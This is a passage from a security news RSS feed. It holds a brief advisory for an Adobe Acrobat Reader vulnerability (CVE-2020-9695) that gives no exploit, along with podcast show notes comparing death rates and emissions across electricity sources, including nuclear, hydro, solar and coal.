works with <a href="https://appleinsider.com/inside/xcode" title="Xcode" data-kpt="1">Xcode</a>'s Swift Package Manager, be reassured that it works, and see immediately just how new or established it is.<br><br><br> <a href="https://appleinsider.com/articles/26/06/24/developer-resource-swift-package-index-to-stay-open-source-after-apple-acquisition?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244761?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2020-9695 | Adobe Acrobat Reader File out-of-bounds write (apsb20-48 / EUVD-2020-31259)]]></title>
<description><![CDATA[A vulnerability categorized as critical has been discovered in Adobe Acrobat Reader up to 2015.006.30523/2017.011.30171/2020.001.30002/2020.009.20074. Impacted is an unknown function of the component File Handler. Executing a manipulation can lead to out-of-bounds write.

This vulnerability is tr...]]></description>
<link>https://tsecurity.de/de/3620537/sicherheitsluecken/cve-2020-9695-adobe-acrobat-reader-file-out-of-bounds-write-apsb20-48-euvd-2020-31259/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620537/sicherheitsluecken/cve-2020-9695-adobe-acrobat-reader-file-out-of-bounds-write-apsb20-48-euvd-2020-31259/</guid>
<pubDate>Wed, 24 Jun 2026 09:36:57 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">critical</a> has been discovered in <a href="https://vuldb.com/product/adobe:acrobat_reader">Adobe Acrobat Reader up to 2015.006.30523/2017.011.30171/2020.001.30002/2020.009.20074</a>. Impacted is an unknown function of the component <em>File Handler</em>. Executing a manipulation can lead to out-of-bounds write.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2020-9695">CVE-2020-9695</a>. The attack can be launched remotely. No exploit exists.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4668: Nuclear Power Technology Follow Up on Safety]]></title>
<description><![CDATA[This show has been flagged as Clean by the host.


--------------------






01 Introduction






This is the second follow up to my 8 part series on nuclear power. In this episode I will attempt to answer a question posed by brian in ohio in a comment on HPR4583. In that comment he said:...]]></description>
<link>https://tsecurity.de/de/3619898/podcasts/hpr4668-nuclear-power-technology-follow-up-on-safety/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3619898/podcasts/hpr4668-nuclear-power-technology-follow-up-on-safety/</guid>
<pubDate>Wed, 24 Jun 2026 02:03:28 +0200</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This show has been flagged as Clean by the host.</p>

<p>
--------------------</p>

<p>

</p>

<p>
01 Introduction</p>

<p>

</p>

<p>
This is the second follow up to my 8 part series on nuclear power. In this episode I will attempt to answer a question posed by brian in ohio in a comment on HPR4583. In that comment he said:</p>

<p>

</p>

<p>
02</p>

<p>
--------------------</p>

<p>

</p>

<p>
Loving this series. Maybe Whiskey Jack could give some cost comparisons between large and small reactors. He could also give us a realistic look at nuclear plant safety/accidents compared to conventional power production. Looking forward to the episode on FORTH generation reactors ;-)</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
03</p>

<p>
End of quote.</p>

<p>

</p>

<p>
The first question I answered in my previous follow up, which was HPR4628. In this episode I will attempt to answer the second question, which was about the safety of nuclear power compared to other sources of electrical power generation.</p>

<p>

</p>

<p>
One of the HPR janitors encouraged me to make this episode, so I think we can thank him for getting another HPR episode made.</p>

<p>

</p>

<p>
04 Defining the Scope</p>

<p>
First, let's define the scope of the question. </p>

<p>

</p>

<p>
This will cover electrical power generation only.</p>

<p>
Within that scope I will consider only the following sources of energy.</p>

<p>

</p>

<p>
05</p>

<p>
Coal</p>

<p>
Oil</p>

<p>
Natural Gas</p>

<p>
Hydroelectric</p>

<p>
Nuclear</p>

<p>
Wind</p>

<p>
Solar</p>

<p>

</p>

<p>
I won't cover geothermal, wave, or tidal power as these are only used in very small amounts and so there simply isn't enough literature on them to base a discussion on . </p>

<p>

</p>

<p>
06 Foreshadow Conclusion</p>

<p>
I should mention right away that I cannot provide absolute answers to this question in the form of a nice, neat ranking table based on numbers from peer reviewed scientific sources. </p>

<p>
The reasons for this will become apparent, but to put it briefly, the data on which to base such a ranking simply doesn't exist. </p>

<p>

</p>

<p>
I will however provide context within which people can think about the issue.</p>

<p>
Wherever possible, I will provide links to the references that I used in the show notes so you can read further on this yourself.</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
07 Energy Catastrophism versus Energy Uniformitarianism</p>

<p>

</p>

<p>
First though I need to go off on a slight geological detour in order to explain an important analogy that I will use.</p>

<p>

</p>

<p>
08</p>

<p>
In the 19th century there was a great debate among geologists over what is known as catastrophism versus uniformitarianism.</p>

<p>
In seeking to explain the origins of the earth and of the landscape that we see around us, there were two points of view.</p>

<p>

</p>

<p>
09</p>

<p>
One was "catastrophism". </p>

<p>
This is the belief that the mountains, valleys, and plains that we see around us were formed as a result of great catastrophes which occurred relatively recently in earth's history. </p>

<p>
This explanation was necessary in order to fit geological features into an earth that was believed to be only a few thousands of years old.</p>

<p>
This view was heavily influenced  by religious belief.</p>

<p>
In this view Noah's flood was the great catastrophe and the fossils of dinosaurs were the remains of animals who had not been saved on the ark and so had died in the flood.</p>

<p>

</p>

<p>
10</p>

<p>
The other point of view was uniformitarianism.</p>

<p>
This was the hypothesis that the landscape we see around us can be explained by the very slow accumulation of very small changes over very long periods of time. </p>

<p>
For this to be true however, the earth had to be far older than the few thousand years that a literal reading of the bible would suggest.</p>

<p>
The earth in fact had to be many, many, millions of years old.</p>

<p>

</p>

<p>
11</p>

<p>
Eventually, the uniformitarian view won out and people understood that while some catastrophes can take place, the shape of the landscape is overwhelmingly due to small changes over very long periods of time.</p>

<p>

</p>

<p>

</p>

<p>
12 How is this Relevant to this Episode You Ask?</p>

<p>
How this is relevant is that I will use this analogy to explain how we need to think about energy and safety.</p>

<p>
Very small numbers of deaths and injuries multiplied over many occurrences can add up to big numbers, comparable in scale or possibly even larger than a single catastrophe or even several of them.</p>

<p>

</p>

<p>
13</p>

<p>
I don't know if anyone else has used this analogy before, I have just thought of this when writing the script for this podcast.</p>

<p>
None the less, I think it is a very useful way of helping to understand the issues.</p>

<p>

</p>

<p>
14</p>

<p>
As an example of this, think about the well known case of the safety of flying versus the safety of travelling in your car.</p>

<p>
Air crashes are catastrophes that make the headlines.</p>

<p>
Automobile crashes are seldom more than local news at best.</p>

<p>
You have probably heard many times the claim that if you making a trip somewhere, you are safer to fly than to drive yourself in your car.</p>

<p>

</p>

<p>

</p>

<p>
15 Example - Hydro versus Solar</p>

<p>
I will now present an example of this.</p>

<p>
Hydro electric power has some notable large scale catastrophes associated with it.</p>

<p>
Roof top solar power does not have any notable catastrophes that I am aware of.</p>

<p>
However, which is safer?</p>

<p>

</p>

<p>
16 Hydro Catastrophes</p>

<p>
Here are three examples of hydro electric catastrophes in just one country, Italy.</p>

<p>

</p>

<p>
The Vajont Dam which collapsed in1963</p>

<p>
An estimated 1,917 to 2,500 people died.</p>

<p>

</p>

<p>
The Sella Zerbino dam which collapsed in 1935.</p>

<p>
More than 100 people died.</p>

<p>

</p>

<p>
The Gleno Dam which collapsed in 1923.</p>

<p>
An estimated 350 people died.</p>

<p>

</p>

<p>
https://damfailures.org/</p>

<p>
https://pmc.ncbi.nlm.nih.gov/articles/PMC4997708/</p>

<p>

</p>

<p>
17</p>

<p>
I haven't tried to compile a global list of the worst hydro electric dam collapses, as this sort of information is actually very difficult to find, even on web sites dedicated to dam failures.</p>

<p>
An additional problem is that information on whether a dam was used for electric power generation or not is often not available.</p>

<p>

</p>

<p>
18</p>

<p>
Dam failures where contradictory or insufficient information is available on whether there was an associated hydro power plant include the 1975 Banqian Dam failure, where death estimates range up to a quarter of a million.</p>

<p>

</p>

<p>
19 Solar Panel Slow Accumulation</p>

<p>
Contrast this with roof top solar panels.</p>

<p>
Many small accidents can add up to big numbers as well.</p>

<p>

</p>

<p>
20</p>

<p>
Health and safety literature discussing solar panel safety mention things such as</p>

<p>
Falls from roofs.</p>

<p>
Electric shock.</p>

<p>
Arc flash (burns from electrical arcing).</p>

<p>
Normal electrical safety procedures which are based around locking out sources of energy do not work with solar panels which makes safety more difficult.</p>

<p>
Heat stress due to working exposed in the hot sun.</p>

<p>

</p>

<p>
Warning from US government on falls by solar panel installers.</p>

<p>
https://stacks.cdc.gov/view/cdc/228946</p>

<p>
https://www.osha.gov/green-jobs/solar</p>

<p>

</p>

<p>

</p>

<p>
21 Why We Cannot Compare the Two</p>

<p>
Hydro catastrophes are not well documented, but we can at least find records of some of the most notable ones.</p>

<p>
However, even those have very large variations in estimates of deaths.</p>

<p>

</p>

<p>
22</p>

<p>
Roof top solar deaths however are largely undocumented.</p>

<p>
The industry is largely unregulated.</p>

<p>
There is no central authority which accumulates many individual deaths or injuries.</p>

<p>
At best there are worker and public safety bodies who simply accumulate those statistics into general construction or household injuries.</p>

<p>

</p>

<p>
23</p>

<p>
Thus we have no reliable means of comparing the two energy sources on a comparable basis.</p>

<p>
We face the same problem with all other major electrical energy sources. </p>

<p>
So far as I am aware, there are no peer reviewed scientific studies which compare the relative safety of all of the major electrical energy sources we are considering here based on actual numbers.</p>

<p>

</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
24 Safety Risks</p>

<p>

</p>

<p>
I will now try to list some the major hazards for each of energy sources we are considering.</p>

<p>
There is however limited data available.</p>

<p>
In many cases we just have reference to worker safety organizations as to what the hazards are.</p>

<p>
I will not attempt here to put numbers to these here. </p>

<p>

</p>

<p>
Categories</p>

<p>

</p>

<p>
25 Coal, Oil, Natural Gas</p>

<p>
The hazards are</p>

<p>
Air pollution</p>

<p>
Mining and oil field accidents</p>

<p>
Pipeline explosions</p>

<p>
Transportation accidents. These- move a lot of material so these are significant.</p>

<p>

</p>

<p>
26 Hydroelectric</p>

<p>
These include</p>

<p>
Dam collapse</p>

<p>
Drowning</p>

<p>

</p>

<p>
27 Nuclear</p>

<p>
These include</p>

<p>
Radiation exposure</p>

<p>

</p>

<p>
28 Wind</p>

<p>
These include</p>

<p>
Falls</p>

<p>
Confined space deaths (there is not much detail on this)</p>

<p>
Electric shock</p>

<p>
Ice throws (that is, throwing pieces of ice off the blades)</p>

<p>
This technology has a significant problem with people working alone which greatly increases risks associated with other dangers.</p>

<p>

</p>

<p>
29 Solar</p>

<p>
These include</p>

<p>
Falls</p>

<p>
Electric shock</p>

<p>
Arc flash</p>

<p>
Heat stress</p>

<p>

</p>

<p>
30</p>

<p>
I have not tried to cover all possible risks associated with each category, just the ones which each industry considers to be the risks they concern themselves with.</p>

<p>
There does not exist any means by which risks of similar types are compared across different industries. </p>

<p>

</p>

<p>
31 Reliability of Supply is Also Safety</p>

<p>
In a completely electrified net zero society, reliability of supply is a safety matter.</p>

<p>
People will die in very large numbers in cold climates if they do not have heat.</p>

<p>
If we have no fossil fuels, we need to also consider how reliably does a grid based on any of the options work.</p>

<p>
I have not seen anyone attempt to address this question and will not attempt to address it here.</p>

<p>
However, it must be addressed in any comprehensive attempt to rank safety. </p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
32 Studies or Articles on Estimates of Relative Safety</p>

<p>

</p>

<p>
Despite the difficulties of comparing the safety of different sources of energy, some people have attempted this anyway.</p>

<p>
Different estimates done at different times had different focuses, so unfortunately we do not have a nice set of studies that we can neatly use to cross check one another.</p>

<p>
I will however list the names and the authors and summarize the results.</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
33 The Health Hazards of Not Going Nuclear</p>

<p>
By Dr. Petr Beckman</p>

<p>
Published in 1976</p>

<p>

</p>

<p>
The author of this book tried to address the relative safety of different sources of energy in the mid 1970s.</p>

<p>
However, it is old at this point, so I won't bother digging through its pages to find his figures.</p>

<p>

</p>

<p>
34</p>

<p>
He mainly focused on comparing electric power generated with coal to nuclear. </p>

<p>
His conclusion was that if the goal was to prevent deaths or ill health in the process of generating electricity, then the logical conclusion was to replace coal fired power plants with nuclear.</p>

<p>

</p>

<p>
35</p>

<p>
The book was relatively well known at the time, as least as far as books on energy are concerned, so I thought it was still worth mentioning.</p>

<p>
I happen to have a copy of this book which I bought back in that time period</p>

<p>
It was the 8th printing of the book, so it would appear to have had relatively good sales. </p>

<p>

</p>

<p>
36</p>

<p>
The author did address the issue of what I have termed "catastrophism" in his comparison of different energy sources, although I don't know if he used this phrase.</p>

<p>
I don't know if he was the first to use this sort of analysis, but he certainly was very influential in terms of popularizing it.</p>

<p>

</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
37 Risk of Energy Production</p>

<p>
by Herbert Inhaber</p>

<p>
Publication AECB 1119</p>

<p>
March 1978</p>

<p>

</p>

<p>
This study is a scientific paper from the same time period as the book "The Health Hazards of Not Going Nuclear".</p>

<p>

</p>

<p>
38</p>

<p>
He based his risk estimates largely on estimates of the amount of material which was used in the construction and operation of various power sources.</p>

<p>
While we could argue over whether or not this is a valid methodology, I think any such argument would be pointless as I think the age of the study alone renders it not relevant today anyway.</p>

<p>
Advancements in materials have changed the basis results significantly by now.</p>

<p>
However, as it exists I thought I would mention it to show that the idea of comparing energy sources to each other is not a new one.</p>

<p>
The author compared a wider variety of potential sources than Beckman did. </p>

<p>

</p>

<p>
39</p>

<p>
Here's his conclusions.</p>

<p>
He assumes equal amounts of energy produced by each method.</p>

<p>
The numbers are normalized such that the total sums to 100%.</p>

<p>
You can think of it in terms of what proportion of total deaths or injuries would result from each source if each were equally used. </p>

<p>

</p>

<p>
40</p>

<p>
Coal 27.5%</p>

<p>
Oil 25.6%</p>

<p>
Methanol 16.7%</p>

<p>
Wind 10.8%</p>

<p>
Solar photovoltaic 9.2%</p>

<p>
Thermal 8.1%</p>

<p>
Solar space heating 1.5%</p>

<p>
Ocean thermal 0.4%</p>

<p>
Nuclear 0.13%</p>

<p>
Natural Gas 0.08%</p>

<p>

</p>

<p>
41</p>

<p>
His natural gas estimate is drastically different from that of other authors. </p>

<p>
I am not going to worry about explaining it however, as the study is as I said old enough to be not very relevant anyway.</p>

<p>
I am mainly including this here out of historical interest. </p>

<p>

</p>

<p>
42</p>

<p>
As a footnote, the methanol he refers to would be synthesized from wood. This was a popular idea in that era as a means of providing liquid fuels for transportation. Practical battery electric cars in those days were strictly science fiction.</p>

<p>

</p>

<p>
43</p>

<p>
The ocean thermal category is a real blast from the past and I had forgotten all about that concept.</p>

<p>
It was a very popular idea at that time and was supposed to be *the* big and upcoming thing in renewable energy.</p>

<p>
It involved various means of attempting to extract energy from differences in water temperature at different depths in the ocean. </p>

<p>
It gradually faded away however, as despite great efforts being put into it, designs never proved to be practical.</p>

<p>

</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
44 Electricity generation and health</p>

<p>
Anil Markandya, Paul Wilkinson</p>

<p>
Published in the Lancet, Vol 370, 15 September 2007</p>

<p>

</p>

<p>
45</p>

<p>
This is more recent than the previous one, although it is nearly 20 years old at this point.</p>

<p>
Unfortunately it doesn't cover wind or solar, just fossil fuels and nuclear.</p>

<p>
However it is still useful, and the Lancet is a very reputable peer reviewed journal.</p>

<p>

</p>

<p>
46</p>

<p>
I will present just the results rather than discussing the whole paper. </p>

<p>
The authors  break it down into deaths among the public, occupational deaths, and air pollution related deaths, serious illness, and minor illness.</p>

<p>

</p>

<p>
47</p>

<p>
They  break the energy sources down into lignite, coal, gas, oil, biomass, and nuclear. </p>

<p>
Lignite is a type of very low grade coal used mainly for electric power generation. </p>

<p>
In this paper biomass refers to energy crops and forest residues.</p>

<p>

</p>

<p>
48</p>

<p>
I will summarize the results by category rather than trying to describe a table that has 6 rows and 5 columns.</p>

<p>

</p>

<p>
All numbers are normalized in terms of deaths or cases per TWh.</p>

<p>

</p>

<p>
49</p>

<p>
Occupational deaths from accidents</p>

<p>
lignite 0.1 </p>

<p>
coal 0.1 </p>

<p>
gas 0.001</p>

<p>
 oil no data</p>

<p>
biomass - no data</p>

<p>
Nuclear is 0.019. </p>

<p>

</p>

<p>
50</p>

<p>
Deaths among the public from accidents</p>

<p>
lignite 0.02 </p>

<p>
coal 0.02 </p>

<p>
gas 0.02</p>

<p>
 oil 0.03</p>

<p>
biomass no data</p>

<p>
Nuclear 0.003</p>

<p>

</p>

<p>
51</p>

<p>
Air pollution deaths</p>

<p>
lignite 32.6</p>

<p>
coal 24.5</p>

<p>
gas 2.8</p>

<p>
 oil 18.4</p>

<p>
biomass 4.63</p>

<p>
Nuclear 0.052</p>

<p>

</p>

<p>
52</p>

<p>
Air pollution serious illnesses</p>

<p>
lignite 298</p>

<p>
coal 225</p>

<p>
gas 30</p>

<p>
 oil 161</p>

<p>
biomass 43</p>

<p>
Nuclear 0.22</p>

<p>

</p>

<p>
53</p>

<p>
Air pollution minor illnesses</p>

<p>
lignite 17,676</p>

<p>
coal 13,288</p>

<p>
gas 703</p>

<p>
 oil 9,551</p>

<p>
biomass 2,276</p>

<p>
Nuclear no data</p>

<p>

</p>

<p>
54</p>

<p>
Natural gas edges out nuclear power slightly in terms of occupational safety, but in every other category nuclear is drastically lower in terms of ill effects than any of the alternatives.</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>

</p>

<p>
55 2020 Fatalities for US Roofers Increased 15% as Solar Roof Installations Increase</p>

<p>
Published in The Next Big Future</p>

<p>
July 6, 2021 by Brian Wang</p>

<p>

</p>

<p>
56</p>

<p>
This seems to be written by someone who has a popular science blog.</p>

<p>
I'm not familiar with it personally, but he addresses the subject so I'll list it.</p>

<p>

</p>

<p>
The title implies that it's all about rooftop solar, but he provides comparative numbers for the other energy sources of interest, so that is useful for our purposes.</p>

<p>
However, he doesn't describe his methodology, so we need to treat them with some caution.</p>

<p>

</p>

<p>
Here are his results</p>

<p>
These are deaths per thousand terawatt hours.</p>

<p>

</p>

<p>
57</p>

<p>
Coal - 100,000</p>

<p>
Oil - 36,000</p>

<p>
Natural gas - 4,000</p>

<p>
Hydro - 1,400</p>

<p>
Rooftop solar - 440</p>

<p>
Wind - 150</p>

<p>
Nuclear - 90</p>

<p>

</p>

<p>
58</p>

<p>
If we plot these numbers on a bar chart, coal and oil are so large that all of the others are squished to the  bottom of the chart and are difficult to see at all.</p>

<p>

</p>

<p>
Let's therefore look at these in terms of orders of magnitude.</p>

<p>
Keep in mind that this is a logarithmic scale.</p>

<p>
This means that the difference between 4 and 5 is much greater in linear terms than the difference between 1 and 2. </p>

<p>

</p>

<p>
59</p>

<p>
Coal - 5</p>

<p>
Oil - 4</p>

<p>
Natural gas - 3</p>

<p>
Hydro - 3</p>

<p>
Rooftop solar - 2</p>

<p>
Wind - 2</p>

<p>
Nuclear - 1</p>

<p>

</p>

<p>
60</p>

<p>
Each of these numbers represents an order of magnitude, that is a power of ten. </p>

<p>
We can see that with rooftop solar, wind, and nuclear, the numbers are so close and the uncertainties are so great and their relative values so small compared to say coal that they can be seen as equivalent so far as safety is concerned.</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
61 What are the safest and cleanest sources of energy?</p>

<p>
by Hannah Ritchie</p>

<p>
Published in Our World in Data</p>

<p>
First published in 2017, updated in 2022 and 2024</p>

<p>

</p>

<p>
62</p>

<p>
The author of this study addressed both deaths and greenhouse gas emissions.</p>

<p>
Deaths from accidents and air pollution are normalized to per TWh of electricity, while greenhouse gas emissions are normalized to GWh of electricity over the life cycle of the plant.</p>

<p>

</p>

<p>
63</p>

<p>
Here are the death figures.</p>

<p>
Coal 24.6</p>

<p>
Oil 18.4</p>

<p>
Biomass 4.6</p>

<p>
Natural Gas 2.8</p>

<p>
Hydro power 1.3</p>

<p>
Wind 0.04</p>

<p>
Nuclear 0.03</p>

<p>
Solar 0.02</p>

<p>

</p>

<p>
64</p>

<p>
For greenhouse gas emissions the figures are</p>

<p>
Coal 970 tons</p>

<p>
Oil 720 tons</p>

<p>
Natural gas 440 tons</p>

<p>
Biomass 78 to 230 tons</p>

<p>
Solar 53 tons</p>

<p>
Hydro power 24 tons</p>

<p>
Wind 11 tons</p>

<p>
Nuclear 6 tons</p>

<p>

</p>

<p>
65</p>

<p>
If we take the death figures and rank them by order of magnitude as we did with the previous article, we get the following.</p>

<p>

</p>

<p>
66</p>

<p>
Coal - 4</p>

<p>
Oil - 4</p>

<p>
Biomass - 3</p>

<p>
Natural Gas - 3</p>

<p>
Hydro power - 3</p>

<p>
Wind - 1</p>

<p>
Nuclear - 1</p>

<p>
Solar - 1</p>

<p>

</p>

<p>
67</p>

<p>
Keep in mind that the previous article covered only rooftop solar and not large industrial installations, and so is not directly comparable. </p>

<p>
Also the units are different, with the previous article being in terms of thousand TWh, and this one being in TWh. </p>

<p>
If we exclude solar (as the numbers are not comparable), Brian Wang's numbers are between 1.5 to 4 times higher than Ritchie's, except for hydro which are almost identical. I think this latter is due to both sets of numbers are dominated by one exceptionally big hydro accident. </p>

<p>

</p>

<p>
68</p>

<p>
Overall however, the relative rankings are quite comparable. </p>

<p>

</p>

<p>
Ritchie's numbers for deaths from coal, oil, and natural gas appear to be directly from the study by  Markandya and Wilkinson mentioned above.</p>

<p>

</p>

<p>
For the benefit of those who are wondering, Ritchie specifically states that her numbers for nuclear include the Chernobyl and Fukushima accidents. </p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>

</p>

<p>
https://www.iaea.org/publications/magazines/bulletin/21-1/solar-power-more-dangerous-nuclear</p>

<p>
Direct link to file</p>

<p>
https://www.iaea.org/sites/default/files/publications/magazines/bulletin/bull21-1/21104091117.pdf</p>

<p>

</p>

<p>
https://ourworldindata.org/safest-sources-of-energy</p>

<p>

</p>

<p>
https://www.thelancet.com/journals/lancet/article/PIIS0140-6736(07)61253-7/abstract</p>

<p>

</p>

<p>
https://www.nextbigfuture.com/2021/07/2020-fatalities-for-us-roofers-increased-15-as-solar-roof-installations-increase.html</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
69 Conclusion from Studies</p>

<p>

</p>

<p>
Remember that in engineering terms, when comparing groups of numbers which contain both both very small numbers and one or more very large numbers, the differences between the small numbers are often not significant. </p>

<p>
The differences between the small numbers may be the product of our ability to measure these things rather than any real differences. </p>

<p>

</p>

<p>
70</p>

<p>
For example, in the article by Ritchie wind power would appear to be twice as dangerous as nuclear.</p>

<p>
However, the difference between them is 0.02 compared to 24.6 for coal. </p>

<p>
In other words, the difference between apparently "dangerous" wind and apparently "safe" nuclear is equivalent to 0.08% of the total for coal. </p>

<p>
It's therefore meaningless and a red herring to even worry about.</p>

<p>

</p>

<p>
71</p>

<p>
With the above taken into consideration, generally the different sources of energy fall into two broad categories in terms of number of deaths, injuries, and illnesses.</p>

<p>
The fossil fuels and biomass fall into one group and wind, solar, and nuclear into another group.</p>

<p>

</p>

<p>
72</p>

<p>
Hydro power would seem to fall into the higher risk category or at least somewhere between the two,  but this I suspect is mainly due to one exceptionally large dam collapse in China, the Banqian Dam failure in 1975.</p>

<p>
This is mentioned as being specifically included in the article written by Ritchie.</p>

<p>
This was a multi-purpose dam, and information on this dam is difficult to find.</p>

<p>
It is not clear to me whether it had a hydro electric generator associated with either it or another dam that was part of the same system.</p>

<p>

</p>

<p>
73</p>

<p>
Some people therefor may argue for its exclusion from the numbers.</p>

<p>
Of course some people may argue for its inclusion anyway, as it was a dam regardless of whether it actually had an electric generator attached.</p>

<p>
If we exclude it, then I think the numbers for hydro power would fall into the same range as for nuclear, wind, and solar.</p>

<p>

</p>

<p>
74</p>

<p>
Most people would consider hydro power to be safe and clean enough regardless of this and I will rank it as such in any conclusions that I come to. </p>

<p>
As you can see, even if we have numbers, it can be a matter of opinion as to how to interpret them.</p>

<p>

</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
75 Taking a Systems Approach</p>

<p>

</p>

<p>
Now let's take a look at the broader energy picture today and into the future.</p>

<p>
Many countries in many parts of the world have committed to the concept of "Net Zero", which means eliminating carbon emissions on a net basis.</p>

<p>
Net zero essentially means the complete electrification of society.</p>

<p>
We must therefore have electrical energy on demand and at low cost.</p>

<p>
We must as a result of this look at complete electrical systems rather than individual sources in isolation.</p>

<p>

</p>

<p>
76</p>

<p>
At one time many electrical systems were entirely coal or entirely hydroelectric.</p>

<p>
This is no longer the case.</p>

<p>
There are now major amounts of wind and solar involved in many countries.</p>

<p>
However these are inherently intermittent.</p>

<p>
This means that other sources of energy are inherently also required to have a functional system.</p>

<p>

</p>

<p>
77</p>

<p>
If any particular solution inherently requires fossil fuels to meet part of the demand, then the safety, pollution, and climate issues relating to those fossil fuels have to be factored in to that complete system when trying to come up with a relative ranking.</p>

<p>

</p>

<p>
Talking about Individual sources in isolation are therefore meaningless in these countries.</p>

<p>

</p>

<p>
78</p>

<p>
There are battery systems,  but these are mainly used to stabilize and regulate the grid plus to a lesser degree to smooth out short term daily peaks in demand. </p>

<p>
They do not have the ability to store large amounts of electricity on a large scale for an entire grid for days, weeks, and months to make up for intermittency. </p>

<p>

</p>

<p>
79</p>

<p>
So a serious attempt to rank sources of energy would need to look at a variety of representative countries and for each one come up with a plan that involves 'x' megawatts from source 'a', 'y' megawatts from source 'b', etc., and total up the values for each. </p>

<p>

</p>

<p>
80</p>

<p>
I am not aware of anyone who has studied this larger issue.</p>

<p>
However, the problem has to be addressed from this perspective in order for any answer to be useful.</p>

<p>
Not taking this into account is like ordering a diet soft drink to go with with a high calorie meal and assuring yourself that your plans to diet are fine. </p>

<p>

</p>

<p>
81</p>

<p>
This is not to imply there is anything inherently wrong with wind or solar.</p>

<p>
It does mean that if your goal is to achieve both net zero and a clean environment, you have to look at your entire energy system as a complete system rather than focusing on what you feel are the most reassuring parts of it while ignoring the rest.</p>

<p>

</p>

<p>
This does however add to the argument that it is in fact inherently very difficult to come up with a system of ranking energy sources for safety.</p>

<p>

</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
82 Nuclear, Climate, and Clean Air - Contrasting Examples</p>

<p>

</p>

<p>
To give a tangible example we will now look at two different places that followed two divergent paths at roughly around the same time frame.</p>

<p>

</p>

<p>
These are the province of Ontario in Canada, and Germany. </p>

<p>

</p>

<p>
83</p>

<p>
Ontario had a mix of coal, hydro electric, and nuclear generating plants.</p>

<p>
Germany had a mix of coal, nuclear and natural gas plants.</p>

<p>

</p>

<p>
Ontario shut down their coal fired plants and kept their nuclear plants.</p>

<p>
Germany however shut down their nuclear plants and kept their coal fired plants.</p>

<p>

</p>

<p>

</p>

<p>
84 The Phase Out of Coal in Ontario</p>

<p>

</p>

<p>
In 2003 Ontario decided to close all of its coal fired generating plants, which consisted of 19 units (that is boilers and turbines) totalling 8,800 MW.</p>

<p>
This phase out was completed by 2014.</p>

<p>

</p>

<p>
85</p>

<p>
Here are the figures for amount of power generated by each energy source in 2003 and 2014.</p>

<p>
Nuclear went from 42% to 60%</p>

<p>
Hydro went from 23% to 24%</p>

<p>
Gas went from 11% to 9%</p>

<p>
Coal went from 25% to 0%</p>

<p>
Non-hydro renewable went from 0% to 7%.</p>

<p>

</p>

<p>
86</p>

<p>
As you can see, the bulk of that replacement came from increased use of nuclear power. </p>

<p>
Furthermore, this did not result in simply replacing coal with natural gas.</p>

<p>
While gas is cleaner than coal, it still has emissions and if you recall from the studies that we looked at earlier, had an estimated death rate roughly 2 orders of magnitude greater than nuclear, solar, or wind.</p>

<p>

</p>

<p>
87</p>

<p>
To put this in more practical terms, at one time Toronto regularly had clouds of smog obscuring it, to a large extent due to these coal fired power plants</p>

<p>

</p>

<p>
With the phase out of coal, smog days went to zero in 2015 compared to 53 a decade earlier.</p>

<p>

</p>

<p>
The 2023 figures for Ontario show carbon emissions of 53 grams per kWh of electricity generated.</p>

<p>
We can use this as a rough benchmark comparison for total emissions.</p>

<p>

</p>

<p>

</p>

<p>
88 The Phase out of Nuclear in Germany</p>

<p>
Until March of 2011, Germany generated one quarter of its electrical power from nuclear.</p>

<p>
Starting in 2011 however, they began shutting down their nuclear power plants.</p>

<p>
These were then phased out over the next decade.</p>

<p>
However, the coal plants were to be kept to 2038.</p>

<p>
In 2026 Germany began talking about increasing use of coal in order to save gas.</p>

<p>
In the same year the German chancellor Friedrich Merz stated that the phase out of nuclear was a </p>

<p>
quote  “serious strategic mistake”.</p>

<p>
EU Commission President Ursula von der Leyen said it was "a strategic mistake for Europe to turn its back on a reliable, affordable source of low-emissions power".</p>

<p>

</p>

<p>
89</p>

<p>
I won't go into the details of the phase out, but let's look at some emissions numbers for Germany.</p>

<p>
If we look at the official numbers from the European Environmental Agency for 2024, for Germany their emissions were 298 grams per kWh of electricity generated.</p>

<p>

</p>

<p>
Recall that we are using emissions as a very rough guide to amount of air pollution, and that this has a direct effect on the safety of the overall electrical energy system.</p>

<p>

</p>

<p>
90</p>

<p>
So, who actually made their people safer, Ontario who phased out their coal plants and kept their nuclear plants, or Germany who phased out their nuclear plants and kept their coal plants?</p>

<p>

</p>

<p>
91</p>

<p>
If you want a comparison directly within Europe, then Germany has one of the highest rates of emissions per kWh of electricity generated, whereas France, who use mainly nuclear power, have one of the lowest at 43 grams per kWh of electricity generated.</p>

<p>

</p>

<p>
Again, who is making their people safer, Germany or France?</p>

<p>

</p>

<p>
92</p>

<p>
I don't want to make it sound like I am picking on Germany.</p>

<p>
I am also not going to tell them how they ought to run their country. </p>

<p>
However they provide a good real world example of how we need to look at things in overall context when we are thinking about the choices that we make. </p>

<p>

</p>

<p>

</p>

<p>
https://www.ontario.ca/page/end-coal</p>

<p>
https://www.cbc.ca/news/canada/windsor/smog-study-shows-significant-decreases-in-pollutants-in-ontario-1.4151183</p>

<p>

</p>

<p>
